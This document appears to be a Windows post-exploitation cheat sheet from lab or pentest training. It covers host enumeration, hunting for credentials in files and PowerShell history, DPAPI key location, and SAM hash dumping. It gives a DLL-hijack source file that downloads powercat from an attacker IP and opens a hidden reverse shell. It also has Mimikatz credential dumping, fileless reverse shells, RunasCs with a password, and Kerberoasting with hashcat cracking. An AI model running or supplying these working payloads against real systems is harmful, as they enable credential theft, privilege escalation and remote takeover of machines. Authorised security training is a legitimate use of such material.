# Post Compromise

There are several key pieces of information we should always obtain:

- Username and hostname
- Group memberships of the current user
- Existing users and groups
- Operating system, version and architecture
- Network information
- Installed applications
- Running processes

### Display network and process info

```
route print
netstat -ano
powershell -command "Get-Process"
tasklist
```

### Check installed applications

```
# 32 Bits
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

# 64 Bits
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
```

### Display Application Details

From cmd.exe, use single quotes inside the `-command` string; nested double quotes end the argument early and the command fails to parse:

```
powershell.exe -command "Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*'"
```
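The checklist and the commands above can be run as one pass. The function below is an added example, not part of the original page: it collects every item of the checklist into a single object so the result can be exported with the loot or compared against another host. It uses only built-in cmdlets; `Get-LocalUser`/`Get-LocalGroup` and the `Get-Net*` cmdlets need PowerShell 5.1 on Windows 10 / Server 2016 or later, and the per-user `HKCU` uninstall key is an addition to the two keys listed on the page.

```powershell
# Added example: one-pass host triage. Built-in cmdlets only.
function Get-HostTriage {
    $os = Get-CimInstance Win32_OperatingSystem
    $cs = Get-CimInstance Win32_ComputerSystem
    $uninstallKeys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',             # 64-bit apps
        'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*', # 32-bit apps on x64
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*'              # per-user installs
    )
    # whoami /groups shows the token's own view: domain groups, integrity level
    # and "deny only" entries, which Get-LocalGroupMember cannot show
    $groups = (whoami /groups /fo csv | ConvertFrom-Csv) |
        Select-Object 'Group Name', Attributes
    $processes = Get-CimInstance Win32_Process | ForEach-Object {
        # GetOwner only succeeds for processes the caller may open; others get no owner
        $o = Invoke-CimMethod -InputObject $_ -MethodName GetOwner -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Pid   = $_.ProcessId
            Name  = $_.Name
            Owner = $(if ($o -and $o.User) { "$($o.Domain)\$($o.User)" } else { '' })
            Path  = $_.ExecutablePath
        }
    }
    [pscustomobject]@{
        User         = "$env:USERDOMAIN\$env:USERNAME"
        Hostname     = $env:COMPUTERNAME
        DomainJoined = $cs.PartOfDomain
        Domain       = $cs.Domain
        OS           = "$($os.Caption) $($os.Version) $($os.OSArchitecture)"
        Groups       = $groups
        LocalUsers   = (Get-LocalUser | Select-Object Name, Enabled, LastLogon)
        LocalGroups  = (Get-LocalGroup | ForEach-Object {
            [pscustomobject]@{
                Group   = $_.Name
                Members = ((Get-LocalGroupMember -Group $_.Name -ErrorAction SilentlyContinue).Name -join ', ')
            }
        })
        Network      = (Get-NetIPConfiguration | Select-Object InterfaceAlias,
            @{ n = 'IPv4';    e = { $_.IPv4Address.IPAddress } },
            @{ n = 'Gateway'; e = { $_.IPv4DefaultGateway.NextHop } },
            @{ n = 'DNS';     e = { $_.DNSServer.ServerAddresses -join ', ' } })
        Listening    = (Get-NetTCPConnection -State Listen |
            Select-Object LocalAddress, LocalPort, OwningProcess)
        Applications = (Get-ItemProperty -Path $uninstallKeys -ErrorAction SilentlyContinue |
            Where-Object DisplayName |
            Select-Object DisplayName, DisplayVersion, Publisher, InstallLocation)
        Processes    = $processes
    }
}

$triage = Get-HostTriage
$triage | Format-List
# keep a copy with the loot; without -Depth the nested objects are flattened to strings
$triage | ConvertTo-Json -Depth 4 | Out-File "$env:TEMP\triage.json"
```

`Processes` comes from WMI rather than `Get-Process -IncludeUserName` because the latter refuses to run from a non-elevated shell, while `GetOwner` simply returns nothing for processes the token cannot open, which is itself a useful hint about where privilege is missing.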

## Searching for files

```powershell
# KeePass databases
powershell -command "Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue"

# text, ini and log files
powershell -command "Get-ChildItem -Path C:\ -Include *.txt,*.ini,*.log -File -Recurse -ErrorAction SilentlyContinue"

# documents in a single user's profile (-Include only filters when -Recurse is set)
powershell -command "Get-ChildItem -Path C:\Users\dave\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue"
```

## Checking History

```powershell
# Current session only
Get-History

# PSReadLine appends every interactive command to a file; ask it where
(Get-PSReadlineOption).HistorySavePath

# Read it (type and cat are PowerShell aliases of Get-Content)
type (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath

# Default location for the current user
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

# Same file from cmd.exe (PowerShell does not expand %userprofile%)
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

# Grep it for passwords (sls is Select-String)
cat (Get-PSReadlineOption).HistorySavePath | sls passw
```

## Locate DPAPI master key files

Each user's master keys live under the Protect folder of their profile, in a subfolder named after the user's SID. The GUID-named files are the encrypted master keys (one per key) and `Preferred` holds the GUID of the key currently in use; they are hidden system files, hence `-Hidden`. Decrypting them needs the user's password or the domain DPAPI backup key.

```powershell
Get-ChildItem C:\Users\dave\AppData\Roaming\Microsoft\Protect\

Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d---s-          4/1/2024   7:55 AM                S-1-5-21-2309961351-4093026482-2223492918-1002             


Get-ChildItem -Hidden  C:\Users\dave\AppData\Roaming\Microsoft\Protect\S-1-5-21-2309961351-4093026482-2223492918-1002


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a-hs-         11/8/2022   7:36 AM            468 1a65c284-d429-4e6b-b7ab-5fc1a2d95636                                 
-a-hs-          4/1/2024   7:55 AM            468 3ff87438-3511-45ac-91ff-611a4521838f                                 
-a-hs-         2/10/2023   5:28 AM            468 7ba528f7-4e73-48a3-8a67-e5680688c9ff                                 
-a-hs-         6/15/2022   7:48 PM            468 d713cea3-8216-4125-b4eb-26f1b4b313e7                                 
-a-hs-          4/1/2024   7:55 AM             24 Preferred 
```
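The file search, history check and DPAPI listing above are all written for one user. The block below is an added example, not from the original page, that runs the same three searches across every profile under `C:\Users` (other users' folders are only readable with sufficient rights; unreadable paths are skipped). The paths and extension list come from the commands above; the extra extensions (`.config`, `.xml`, `.ps1`, `.bat`) and the password regex are assumptions.

```powershell
# Added example: credential hunting across all user profiles.
$Extensions  = '*.txt','*.ini','*.log','*.kdbx','*.pdf','*.xls','*.xlsx','*.doc','*.docx',
               '*.config','*.xml','*.ps1','*.bat'          # last four are an assumption
$BinaryExt   = '.kdbx','.pdf','.xls','.xlsx','.doc','.docx' # report, do not grep
$SecretRegex = '(?i)passw|pwd=|secret|apikey|connectionstring' # assumption
$HistoryRel  = 'AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt'
$ProtectRel  = 'AppData\Roaming\Microsoft\Protect'

function Find-InterestingFiles {
    param([string]$Root = 'C:\Users', [string[]]$Include = $Extensions)
    Get-ChildItem -Path $Root -Include $Include -File -Recurse -Force -ErrorAction SilentlyContinue |
        Where-Object { $_.Length -lt 5MB } |    # skip large logs and binaries
        ForEach-Object {
            $f = $_
            if ($f.Extension -in $BinaryExt) {
                [pscustomobject]@{ File = $f.FullName; Line = $null; Match = '(binary, review manually)' }
            } else {
                Select-String -Path $f.FullName -Pattern $SecretRegex -ErrorAction SilentlyContinue |
                    Select-Object -First 5 |
                    ForEach-Object {
                        [pscustomobject]@{ File = $f.FullName; Line = $_.LineNumber; Match = $_.Line.Trim() }
                    }
            }
        }
}

function Get-AllPSHistory {
    foreach ($prof in Get-ChildItem 'C:\Users' -Directory -ErrorAction SilentlyContinue) {
        $h = Join-Path $prof.FullName $HistoryRel
        if (Test-Path -LiteralPath $h) {
            # every interactive command the user typed, oldest first
            Get-Content -LiteralPath $h -ErrorAction SilentlyContinue |
                Where-Object { $_ -match $SecretRegex -or
                               $_ -match 'net use|runas|cmdkey|-Credential|ConvertTo-SecureString' } |
                ForEach-Object { [pscustomobject]@{ User = $prof.Name; Command = $_ } }
        }
    }
}

function Get-DpapiMasterKeyFiles {
    # GUID-named files are the user's encrypted master keys; Preferred names the current one
    foreach ($prof in Get-ChildItem 'C:\Users' -Directory -ErrorAction SilentlyContinue) {
        $p = Join-Path $prof.FullName $ProtectRel
        Get-ChildItem -LiteralPath $p -Directory -ErrorAction SilentlyContinue |
            Where-Object Name -like 'S-1-5-21-*' |
            ForEach-Object {
                $sidDir = $_
                Get-ChildItem -LiteralPath $sidDir.FullName -Hidden -File -ErrorAction SilentlyContinue |
                    ForEach-Object {
                        [pscustomobject]@{ User = $prof.Name; SID = $sidDir.Name; File = $_.Name; Size = $_.Length }
                    }
            }
    }
}

Find-InterestingFiles   | Format-Table -AutoSize
Get-AllPSHistory        | Format-Table -AutoSize
Get-DpapiMasterKeyFiles | Format-Table -AutoSize
```

Binary formats are listed rather than grepped because `Select-String` on an `.xlsx` or `.kdbx` produces noise; a KeePass database is worth exfiltrating whole and attacking offline.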

## Dumping SAM hashes offline (secretsdump)

With the SAM and SYSTEM registry hives saved from the target (for example with `reg save` from an elevated shell) and copied to the attacking machine, extract the local account hashes offline:

```
impacket-secretsdump LOCAL -sam SAM -system SYSTEM
```

## DLL hijacking (write access under System32 but no shell)

### tzres.dll

1. Compile a custom DLL (rev.cpp below) and place it at C:\Windows\System32\tzres.dll:

```bash
# cross-compiler for Windows DLLs on Linux (install once)
sudo apt-get install mingw-w64

# build the DLL; the file name matters because the loading process asks for it by name
x86_64-w64-mingw32-gcc rev.cpp --shared -o tzres.dll
```

rev.cpp

```cpp
#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
    switch ( ul_reason_for_call )
    {
        case DLL_PROCESS_ATTACH: // A process is loading the DLL.
        // system() blocks until the spawned PowerShell exits, so the loading
        // process stays stuck inside DllMain (holding the loader lock) for as
        // long as the reverse shell is alive.
        system ("powershell -w hidden -ep bypass IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.206/powercat.ps1'); powercat -c 192.168.45.206 -p 17788 -e powershell");
        break;
        case DLL_THREAD_ATTACH: // A process is creating a new thread.
        break;
        case DLL_THREAD_DETACH: // A thread exits normally.
        break;
        case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}

```

1.1 Optional: encode the PowerShell command. A base64-encoded command avoids the quoting problems of embedding a long command line inside the DLL's `system()` string:

```bash
# on the attacking machine: PowerShell -enc expects base64 of the UTF-16LE command
echo "IEX (New-Object Net.webclient).downloadString('http://192.168.45.211:80/ps.ps1')" | iconv -t utf-16le | base64 -w 0; echo

# resulting command to put in the DLL (decodes to the line above)
powershell -ep bypass -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIAMQAxADoAOAAwAC8AcABzAC4AcABzADEAJwApAAoA
```

2. Open listener

```
sudo rlwrap nc -nlvp 17788
```

3. Wait for a process to load the DLL; the shell that connects back runs in that process's context (SYSTEM when a service loads it).

### PrintConfig.dll

1. Compile a custom DLL (rev.cpp above works unchanged) and place it at C:\Windows\System32\spool\drivers\x64\3\PrintConfig.dll.
2. Instantiate the PrintNotify COM object from PowerShell; the PrintNotify service loads PrintConfig.dll to serve it, which runs the DLL's DllMain in the service's context:

```
$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)
```

3. Catch the SYSTEM shell on the listener (step 2 of the tzres.dll procedure).

Other DLL names that can be used in the same way:

- wpcoreutil.dll
- phoneinfo.dll
- dxgi.dll
- wlbsctrl.dll
- wbecomn.dll
- ualapi.dll
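Before planting any of the DLLs above it is worth knowing which paths the current token can actually write to. The block below is an added example, not from the original page: for each candidate path it reports whether the file already exists and which principals hold write rights, using the file's own ACL when it exists and the parent directory's ACL (create rights) when it does not. The candidate list is built from the names on this page; the full paths for the six bare names are an assumption (System32).

```powershell
# Added example: check write access to the DLL drop paths listed above.
$Candidates = @(
    'C:\Windows\System32\tzres.dll',
    'C:\Windows\System32\spool\drivers\x64\3\PrintConfig.dll',
    'C:\Windows\System32\wpcoreutil.dll',   # assumed location
    'C:\Windows\System32\phoneinfo.dll',    # assumed location
    'C:\Windows\System32\dxgi.dll',         # assumed location
    'C:\Windows\System32\wlbsctrl.dll',     # assumed location
    'C:\Windows\System32\wbecomn.dll',      # assumed location
    'C:\Windows\System32\ualapi.dll'        # assumed location
)

# ACE bits that allow writing a file or creating one in a directory: WriteData/CreateFiles (0x2),
# plus the un-mapped GENERIC_WRITE (0x40000000) and GENERIC_ALL (0x10000000) bits some ACEs carry
$WriteBits = 0x2 -bor 0x40000000 -bor 0x10000000

function Get-TokenPrincipalNames {
    # current user plus every group in the token, as DOMAIN\Name strings
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    foreach ($sid in (@($id.User) + @($id.Groups))) {
        try   { $sid.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $sid.Value }   # unresolvable SID: keep the raw S-1-... form
    }
}

function Test-DllDropPath {
    param([Parameter(Mandatory)][string[]]$Path)
    $mine = Get-TokenPrincipalNames
    foreach ($p in $Path) {
        $exists = Test-Path -LiteralPath $p -PathType Leaf
        # an existing file is overwritten under its own ACL; a missing one needs
        # create rights on the parent directory
        $target  = if ($exists) { $p } else { Split-Path -Parent $p }
        $writers = @()
        $note    = ''
        try {
            $acl = Get-Acl -LiteralPath $target -ErrorAction Stop
            $writers = @($acl.Access |
                Where-Object { $_.AccessControlType -eq 'Allow' -and
                               (([int]$_.FileSystemRights) -band $WriteBits) -ne 0 } |
                ForEach-Object { $_.IdentityReference.Value } |
                Sort-Object -Unique)
        } catch { $note = "ACL not readable: $($_.Exception.Message)" }
        [pscustomobject]@{
            Path         = $p
            Exists       = $exists
            AclOf        = $target
            WritableByMe = [bool]($writers | Where-Object { $mine -contains $_ })
            WriteAllowed = ($writers -join ', ')
            Note         = $note
        }
    }
}

Test-DllDropPath -Path $Candidates | Format-Table Path, Exists, WritableByMe, WriteAllowed, Note -AutoSize
```

Two caveats: Deny ACEs are not evaluated, so the result is advisory, and in a non-elevated shell the BUILTIN\Administrators group is present in the token only as a deny-only entry. A `WritableByMe` that is true solely because of that group means the write will work after elevation, not now. Files that already exist and are owned by TrustedInstaller will show only that account as a writer, which is the expected answer for a stock System32.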

## Mimikatz

Needs an elevated context: `privilege::debug` requires SeDebugPrivilege (administrators) and `token::elevate` impersonates SYSTEM so LSASS can be read.

```powershell
# download the binary to disk (IEX only works for scripts, not for an executable)
(New-Object System.Net.WebClient).DownloadFile('http://192.168.45.206/mimikatz.exe', "$PWD\m.exe")
.\m.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit" > mout.txt
```

## Fileless Reverse Shell

```powershell
powershell -ep bypass IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.206/powercat.ps1'); powercat -c 192.168.45.206 -p 17788 -e powershell
```

## Reverse shell as another user with RunasCs (an .exe build of RunasCs also exists)

```powershell
# Invoke-RunasCs is defined in memory by the IEX; the command it runs is a second fileless reverse shell as svc_mssql
iex(new-object net.webclient).downloadString('http://192.168.45.160/Invoke-RunasCs.ps1'); Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "powershell -ep bypass IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.160/powercat.ps1'); powercat -c 192.168.45.160 -p 17676 -e powershell"
```

Make sure the web server on the attacking machine serves both scripts; both downloads should show up in its log:

```
python3 -m http.server 80

192.168.249.187 - - [11/May/2024 15:14:01] "GET /Invoke-RunasCs.ps1 HTTP/1.1" 200 -
192.168.249.187 - - [11/May/2024 15:14:01] "GET /powercat.ps1 HTTP/1.1" 200 -
```

## Kerberoasting from the host (Get-SPN.ps1 / Invoke-Kerberoast)

```powershell
# enumerate accounts with an SPN; the script is saved to disk, so run it from where it was saved
powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.49.211/Get-SPN.ps1','C:\Users\Public\Get-SPN.ps1'); C:\Users\Public\Get-SPN.ps1

# request a service ticket for the svc_mssql SPN; the TGS-REP is cached in the session
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'MSSQLSvc/DC.access.offsec'
```

On the attacking machine, fetch Invoke-Kerberoast.ps1 and serve it over HTTP:

```bash
wget https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1
```

Then, on the target, request tickets for every SPN account and print them in hashcat format:

```powershell
iex(new-object net.webclient).downloadString('http://192.168.49.211:80/Invoke-Kerberoast.ps1'); Invoke-Kerberoast -OutputFormat Hashcat
```

Save the hash to a file (here svc_mssql.kerberoast), one hash per line. If it was copied from the console, delete the spaces and line breaks the console wrapped into it; a hash split across lines does not parse. Crack it with hashcat mode 13100 (Kerberos 5 TGS-REP, etype 23):

```bash
hashcat -m 13100 --force -a 0 svc_mssql.kerberoast /usr/share/wordlists/rockyou.txt
```

